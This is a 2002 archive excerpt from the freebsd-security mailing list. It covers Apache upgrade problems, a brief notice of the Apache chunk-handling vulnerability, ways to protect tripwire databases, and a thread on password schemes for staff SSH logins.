is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618215553.0230da10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 21:57:05 -0600 To: Lawrence Sica , security@FreeBSD.ORG From: Brett Glass Subject: Re: CDs with patched Apache? In-Reply-To: <3D0FDE0D.2040100@earthlink.net> References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> <4.3.2.7.2.20020618033604.00d42aa0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:27 PM 6/18/2002, Lawrence Sica wrote: >Honestly I never use the CD packages since they will be outdated by the time I use it. That's exactly why commercial software vendors have moved to a "CD plus downloaded patches" model. They want you to buy a CD but also want you to have the latest patches. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21: 6:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 5EB1037B407 for ; Tue, 18 Jun 2002 21:06:11 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5J46A569751 for ; Tue, 18 Jun 2002 22:06:10 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Tue, 18 Jun 2002 22:06:10 -0600 (CST) From: Ryan Thompson To: freebsd-security@freebsd.org Subject: Password security Message-ID: <20020618204711.I65632-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, My staffers are using plain old passwords for logins. ALL logins are via SSH from various platforms, using passwords. Some are logging in from Windows clients that don't support much else. And, on the security/convenience continuum, I won't have much of a network to secure if nobody gets any work done. :-) I'm well aware of the inherent insecurity of what your average human can remember. It's currently a weak link for us, so it is one aspect of our security that I would like to improve. So, for the purposes of this message, please assume all other avenues have been secured. ;-) So, given the limitations of remote access (from machines assumed to be insecure), and some fairly dumb Windows clients, what are some solutions to password security? The best I've come up with so far is to issue random passwords, from an array of 68 possible characters (alpha num and some easily-typed symbols). I issue two passwords for each user. One is short enough to be remembered with a small effort (6 characters, entropy > 2^36, assuming my randomizer is up to par). The second password is longer (10 characters, > 2^60), and is designed to be printed on a small card that the user carries with them like a token or a key. Obviously, you could argue the merits of shorter vs. longer keys. My choices are still quite arbitrary at this stage. New passwords would be issued at regular intervals. (Remember, these are staff members. I can do that. :-) I realize there is nothing particularly novel about this idea. When staffers log in, they just append both passwords, obtaining a 16 character password with 2^97 possibilities. (*not* worth the effort required to brute force, given the other weaker avenues available). So, the idea is that a much better overall entropy is obtained, like using a secret password plus a physical key. The unlikely worst case: an attacker knows this system (password length and character set), physically mugs a user, is able to obtain the system password hash, AND has the resources to brute force the remaining 6 character remembered secret. This still gives the staff member several hours to change his or her password if he/she suspects the key was compromised. I know that people *want* to re-use their favorite dictionary password(s)... so there will be *some* resistance to a system like the above... but does anyone have any comments on either the system from a password security standpoint, or from a managerial/practical standpoint? Have you done something similar? Completely different? I'm not really interested in a "passwords are bad" debate, unless there are readily available technologies of which I'm not aware that can be deployed across many dumb insecure computers across an insecure network. Thanks! - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21:15: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 9405337B405 for ; Tue, 18 Jun 2002 21:14:58 -0700 (PDT) Received: from [80.129.121.242] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KWrw-0001DD-00 for freebsd-security@freebsd.org; Wed, 19 Jun 2002 06:14:57 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id B83E5DD for ; Wed, 19 Jun 2002 06:14:54 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 61DF46E for ; Wed, 19 Jun 2002 06:14:51 +0200 (CEST) Subject: Apache 1.3.26 port From: Jan Lentfer To: freebsd-security@freebsd.org Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/1.0.2-5mdk Date: 19 Jun 2002 06:14:08 +0200 Message-Id: <1024460049.2166.6.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, i am new to this list, so I don't know if this is the right place for my comment, so please be gentle ;-) After reading all the mail about the apache vulnerability, today I installed the new 1.3.26 port. The compilation, etc. went clean, I also had to reinstall mod_php4 and mod_fastcgi until I could make apache start. Then I found that all my subdirectories in /usr/local/data/www were gone (deleted)!! Luckily this was on my private machine! Is this a normal behaviour? Anyway, it's good I know it now so I will for sure backup the directorires on my production machines Regards, Jan Lentfer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21:18: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from omta03.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by hub.freebsd.org (Postfix) with ESMTP id E20D137B411 for ; Tue, 18 Jun 2002 21:18:01 -0700 (PDT) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta03.mta.everyone.net (Postfix) with ESMTP id 05E3A48CC4 for ; Tue, 18 Jun 2002 21:18:00 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id ECD6E2756; Tue, 18 Jun 2002 21:17:59 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Tue, 18 Jun 2002 21:17:59 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: freebsd-security@freebsd.org Subject: Apache Web Server Chunk Handling Vulnerability Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.128.45] Message-Id: <20020619041759.ECD6E2756@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is a remotely exploitable vulnerability in the way that Apache web servers (or other web servers based on their source code) handle data encoded in chunks. This vulnerability is present by default in configurations of Apache web server versions 1.2.2 and above, 1.3 through 1.3.24, and versions 2.0 through 2.0.36. The impact of this vulnerability is dependent upon the software version and the hardware platform the server is running on. Detailed CERT advisory can be found at: http://www.cert.org/advisories/CA-2002-17.html You can download the new releases from: http://www.apache.org/dist/httpd/ Regards, --------- Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21:35:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 8751537B40B for ; Tue, 18 Jun 2002 21:35:46 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5J4Un9g041831; Wed, 19 Jun 2002 00:30:50 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Klaus Steden'" , "'Maxlor'" Cc: Subject: RE: preventing tampering with tripwire Date: Tue, 18 Jun 2002 23:34:46 -0500 Message-ID: <000b01c2174a$a75d8d20$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020618194958.K99167@cthulu.compt.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org AFAIK, you could use a simply floppy disk, possibly a secondary one if you use the primary one (they're only like $20 US now a days...). That make the setting and un-setting of read-only fairly simple. I don't remember how big tripwire (the executable) and its config files are, or you *could* use a ZIP disk. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Klaus Steden Sent: Tuesday, June 18, 2002 6:50 PM To: Maxlor Cc: freebsd-security@FreeBSD.ORG Subject: Re: preventing tampering with tripwire Read-only media is a good thing, too. It may be overkill (in the case of security, is there such a thing, though?), but you could re-purpose an old disk drive, add security tools you want to it, and jumper it read-only. That wouldn't necessarily prevent your database from being compromised, but your tools would be intact. With a read-only disk, I would ... - install the security tools you want on it - generate any baseline configuration data and signatures - make the disk physically read-only - run your nightly cron jobs, comparing your daily results against your read-only baseline. Of course, every time you upgrade something, you'll have to unjumper the disk, update your signatures, and rejumper it, but that's not really such a big deal when compared with what else you might have to do. :> Keeping known good copies of essential programs (ls, find, dd, netstat, route, ifconfig, mv, cp, df, etc.) on the read-only media is a good idea, too. You could accomplish this with CDROMs if you don't want to use a disk drive, but you lose the option of rewritability. hope this helps, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21:47:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 0963E37B404 for ; Tue, 18 Jun 2002 21:47:49 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5J4h39g041890; Wed, 19 Jun 2002 00:43:04 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Ryan Thompson'" , Subject: RE: Password security Date: Tue, 18 Jun 2002 23:47:00 -0500 Message-ID: <000c01c2174c$5a38f230$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Have you explored the idea of biometrics? It requires a piece of hardware on each computer that is going to access the network, but the way you're making your security requirements sound, the security benefit is worth the cost. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Ryan Thompson Sent: Tuesday, June 18, 2002 11:06 PM To: freebsd-security@FreeBSD.ORG Subject: Password security Hi all, My staffers are using plain old passwords for logins. ALL logins are via SSH from various platforms, using passwords. Some are logging in from Windows clients that don't support much else. And, on the security/convenience continuum, I won't have much of a network to secure if nobody gets any work done. :-) I'm well aware of the inherent insecurity of what your average human can remember. It's currently a weak link for us, so it is one aspect of our security that I would like to improve. So, for the purposes of this message, please assume all other avenues have been secured. ;-) So, given the limitations of remote access (from machines assumed to be insecure), and some fairly dumb Windows clients, what are some solutions to password security? The best I've come up with so far is to issue random passwords, from an array of 68 possible characters (alpha num and some easily-typed symbols). I issue two passwords for each user. One is short enough to be remembered with a small effort (6 characters, entropy > 2^36, assuming my randomizer is up to par). The second password is longer (10 characters, > 2^60), and is designed to be printed on a small card that the user carries with them like a token or a key. Obviously, you could argue the merits of shorter vs. longer keys. My choices are still quite arbitrary at this stage. New passwords would be issued at regular intervals. (Remember, these are staff members. I can do that. :-) I realize there is nothing particularly novel about this idea. When staffers log in, they just append both passwords, obtaining a 16 character password with 2^97 possibilities. (*not* worth the effort required to brute force, given the other weaker avenues available). So, the idea is that a much better overall entropy is obtained, like using a secret password plus a physical key. The unlikely worst case: an attacker knows this system (password length and character set), physically mugs a user, is able to obtain the system password hash, AND has the resources to brute force the remaining 6 character remembered secret. This still gives the staff member several hours to change his or her password if he/she suspects the key was compromised. I know that people *want* to re-use their favorite dictionary password(s)... so there will be *some* resistance to a system like the above... but does anyone have any comments on either the system from a password security standpoint, or from a managerial/practical standpoint? Have you done something similar? Completely different? I'm not really interested in a "passwords are bad" debate, unless there are readily available technologies of which I'm not aware that can be deployed across many dumb insecure computers across an insecure network. Thanks! - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 21:57:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from hobbits.brel.com (hobbits.brel.com [203.127.231.61]) by hub.freebsd.org (Postfix) with ESMTP id 416B337B404 for ; Tue, 18 Jun 2002 21:57:43 -0700 (PDT) Received: by hobbits.brel.com (Postfix, from userid 1001) id 8624E3316; Wed, 19 Jun 2002 12:57:40 +0800 (SGT) Date: Wed, 19 Jun 2002 12:57:40 +0800 From: Calvin NG To: Eric F Crist Cc: 'Klaus Steden' , 'Maxlor' , freebsd-security@FreeBSD.ORG Subject: Re: preventing tampering with tripwire Message-ID: <20020619125740.L73593@brel.com> References: <20020618194958.K99167@cthulu.compt.com> <000b01c2174a$a75d8d20$77fe180c@armageddon> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <000b01c2174a$a75d8d20$77fe180c@armageddon>; from ecrist@adtechintegrated.com on Tue, Jun 18, 2002 at 11:34:46PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings, for me, I do a MD5 has of the files in /var/adm/tcheck/database, plus keep a copy of the files offsite. ths MD5 lets me easily verify that the tripwire databases are still reliable, and I know I got a reliable copy somewhere if it happens to get compromised, or I got paranoia. which ever happens first ;-) Regards, /calvin lines with :> are quotes from Eric F Crist's email :> AFAIK, you could use a simply floppy disk, possibly a secondary one if :> you use the primary one (they're only like $20 US now a days...). That :> make the setting and un-setting of read-only fairly simple. :> :> I don't remember how big tripwire (the executable) and its config files :> are, or you *could* use a ZIP disk. :> :> Eric F Crist :> President/Sys Admin :> AdTech Integrated Systems, Inc :> http://www.adtechintegrated.com :> :> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 22: 4:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 3BD1B37B401 for ; Tue, 18 Jun 2002 22:04:55 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5J54kD75187; Tue, 18 Jun 2002 23:04:49 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Tue, 18 Jun 2002 23:04:44 -0600 (CST) From: Ryan Thompson To: Eric F Crist Cc: freebsd-security@FreeBSD.ORG Subject: RE: Password security In-Reply-To: <000c01c2174c$5a38f230$77fe180c@armageddon> Message-ID: <20020618225214.L74293-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Eric, Eric F Crist wrote to 'Ryan Thompson' and freebsd-security@FreeBSD.ORG: > Have you explored the idea of biometrics? Yes. Bad idea. I knew someone would suggest that. My original post was too long already to include biometrics, so, since you asked, here it is. :-) > It requires a piece of hardware on each computer that is going to > access the network, but the way you're making your security > requirements sound, the security benefit is worth the cost. Depending on the metric somewhat, collecting biometrics on insecure systems is a serious security risk. Hardware costs aside (about 20 terminals, a few of which are home systems not even owned by the company), it's far too easy to replay biometrics if the end system isn't secure... and, last time I checked, most of my employees had only 10 fingers each. Once those are gone, what then? Eyeballs? :-) So, on a lot of levels, biometrics are not an option. So, let's stick with password security for now. :-) > Eric F Crist > President/Sys Admin > AdTech Integrated Systems, Inc > http://www.adtechintegrated.com -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 22:13:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 0D91537B40A for ; Tue, 18 Jun 2002 22:13:30 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5J5DQW75845; Tue, 18 Jun 2002 23:13:27 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Tue, 18 Jun 2002 23:13:26 -0600 (CST) From: Ryan Thompson To: Tom Rhodes Cc: freebsd-security@freebsd.org Subject: Re: Password security In-Reply-To: <3D103A8A.2000503@pittgoth.com> Message-ID: <20020618230452.X74293-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Tom, Tom Rhodes wrote to Ryan Thompson: > Ryan, > > Did you know that ssh supports keys? Yes. :-) The basic problem with public/private key encryption is the security and installation of the private key. I don't expect users to be able to properly secure their private key on insecure systems. > The method described above would also be wonderful to keep users > from accessing the system outside the workplace. Which is one of the main reasons it won't work, given that a fair percentage of our staff access the system from outside the workplace, :-) Thanks, - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 22:26: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from gateway.wadham.ox.ac.uk (gateway.wadham.ox.ac.uk [163.1.161.253]) by hub.freebsd.org (Postfix) with SMTP id 1188F37B414 for ; Tue, 18 Jun 2002 22:26:02 -0700 (PDT) Received: (qmail 10003 invoked by uid 74); 19 Jun 2002 05:26:00 -0000 Received: from colin.percival@wadham.ox.ac.uk by gateway by uid 71 with qmail-scanner-1.12 (sweep: 2.10/3.57. . Clear:. Processed in 0.714821 secs); 19 Jun 2002 05:26:00 -0000 Received: from dhcp1125.wadham.ox.ac.uk (HELO piii600.wadham.ox.ac.uk) (163.1.161.125) by gateway.wadham.ox.ac.uk with SMTP; 19 Jun 2002 05:25:59 -0000 X-Info-RBL1: ox.ac.uk filters email against various lists. X-Info-RBL2: If your replies bounce, try sending them to cperciva@sfu.ca Message-Id: <5.0.2.1.1.20020619062008.029dc740@popserver.sfu.ca> X-Sender: cperciva@popserver.sfu.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Wed, 19 Jun 2002 06:25:54 +0100 To: Ryan Thompson From: Colin Percival Subject: Re: Password security Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020618230452.X74293-100000@ren.sasknow.com> References: <3D103A8A.2000503@pittgoth.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 23:13 18/06/2002 -0600, Ryan Thompson wrote: >The basic problem with public/private key encryption is the security >and installation of the private key. I don't expect users to be able >to properly secure their private key on insecure systems. I don't expect users to be able to properly guard against keyloggers on insecure systems, either. Colin Percival To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 22:32:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from hobbits.brel.com (hobbits.brel.com [203.127.231.61]) by hub.freebsd.org (Postfix) with ESMTP id 0B6E737B40C for ; Tue, 18 Jun 2002 22:32:44 -0700 (PDT) Received: by hobbits.brel.com (Postfix, from userid 1001) id 0F7B23316; Wed, 19 Jun 2002 13:32:41 +0800 (SGT) Date: Wed, 19 Jun 2002 13:32:41 +0800 From: Calvin NG To: Ryan Thompson Cc: Tom Rhodes , freebsd-security@FreeBSD.ORG Subject: Re: Password security Message-ID: <20020619133241.M73593@brel.com> References: <3D103A8A.2000503@pittgoth.com> <20020618230452.X74293-100000@ren.sasknow.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020618230452.X74293-100000@ren.sasknow.com>; from ryan@sasknow.com on Tue, Jun 18, 2002 at 11:13:26PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings, if you are worried about insecured "access terminals/workstations", then you will be worried about sniffers on them. Password is out. S/Key has a higher chance of success, if you can give the user a secured way of calculating the password. The initialisation of the key can be done from a secured terminal, or at the console of your server, (under supervision), which I think we can assume is secured (right?). The passphrase can use your system for password, part of it in their head, the other part written down on a card. That left the secure entering of passphrase to generate the one time pass. Alternatively, you can generate 10 one-tine passwords at a time, for the user to carry around and use. And they come back to you to re-init/get the next 10 passwords. Yet another alternative, issue PDAs that has s/key calculators. Whatever. Well, I use s/key when I am travelling and need to have remote access. And I don't trust dial-ups, and terminals in internet-cafe or at the conference locations that much. Well, you know what I mean. Regards, /calvin lines with :> are quotes from Ryan Thompson's email :> :> Hi Tom, :> :> :> Tom Rhodes wrote to Ryan Thompson: :> :> > Ryan, :> > :> > Did you know that ssh supports keys? :> :> Yes. :-) :> :> The basic problem with public/private key encryption is the security :> and installation of the private key. I don't expect users to be able :> to properly secure their private key on insecure systems. :> :> :> > The method described above would also be wonderful to keep users :> > from accessing the system outside the workplace. :> :> Which is one of the main reasons it won't work, given that a fair :> percentage of our staff access the system from outside the workplace, :> :-) :> :> Thanks, :> - Ryan :> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 22:36:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 3EC7237B40C for ; Tue, 18 Jun 2002 22:36:09 -0700 (PDT) Date: Wed, 19 Jun 2002 01:36:04 -0400 From: Klaus Steden To: Ryan Thompson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password security Message-ID: <20020619013603.O99167@cthulu.compt.com> References: <20020618204711.I65632-100000@ren.sasknow.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com>; from ryan@sasknow.com on Tue, Jun 18, 2002 at 10:06:10PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > My staffers are using plain old passwords for logins. ALL logins are > via SSH from various platforms, using passwords. Some are logging in > from Windows clients that don't support much else. And, on the > security/convenience continuum, I won't have much of a network to > secure if nobody gets any work done. :-) > > I'm well aware of the inherent insecurity of what your average human > can remember. It's currently a weak link for us, so it is one aspect > of our security that I would like to improve. So, for the purposes of > this message, please assume all other avenues have been secured. ;-) > > So, given the limitations of remote access (from machines assumed to > be insecure), and some fairly dumb Windows clients, what are some > solutions to password security? > > The best I've come up with so far is to issue random passwords, from > an array of 68 possible characters (alpha num and some easily-typed > symbols). I issue two passwords for each user. One is short enough to > be remembered with a small effort (6 characters, entropy > 2^36, > assuming my randomizer is up to par). The second password is longer > (10 characters, > 2^60), and is designed to be printed on a small card > that the user carries with them like a token or a key. Obviously, you > could argue the merits of shorter vs. longer keys. My choices are > still quite arbitrary at this stage. New passwords would be issued at > regular intervals. (Remember, these are staff members. I can do that. > :-) > In the meantime, you could crack them on a regular basis for them. John the Ripper does a pretty good job of my password files, with a dictionary of about 6 million odd words. It's usually a bit of an eye-opener for someone to discover his 'highly secure' password staring at him when he opens his email. HTH, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 23: 1:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 0E17A37B406 for ; Tue, 18 Jun 2002 23:01:49 -0700 (PDT) Received: from [80.129.121.242] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KYXL-0001IN-00; Wed, 19 Jun 2002 08:01:47 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id B97B3DD; Wed, 19 Jun 2002 08:01:43 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 7D7666E; Wed, 19 Jun 2002 08:01:40 +0200 (CEST) Subject: Re: Apache 1.3.26 port From: Jan Lentfer To: Bob K Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020619011913.J5464@yip.org> References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619011913.J5464@yip.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/1.0.2-5mdk Date: 19 Jun 2002 08:00:57 +0200 Message-Id: <1024466457.2166.9.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Mit, 2002-06-19 um 07.19 schrieb Bob K: > Backups, especially before upgrades, are generally a good idea... I know :). I did this upgrade at 5:30am before first coffee - maybe not the best time and condition :) Thanks, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 0: 8:18 2002 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 538) id 2DF4037B40D; Wed, 19 Jun 2002 00:08:06 -0700 (PDT) To: security@freebsd.org From: Majordomo@FreeBSD.ORG Subject: Majordomo results Reply-To: Majordomo@FreeBSD.ORG Message-Id: <20020619070806.2DF4037B40D@hub.freebsd.org> Date: Wed, 19 Jun 2002 00:08:06 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -- >>>> Hello majordomo, **** Command 'hello' not recognized. >>>> >>>> unsubscribe freebsd-security **** unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'. **** contact "postmaster@FreeBSD.ORG" if you need help. >>>> >>>> -- 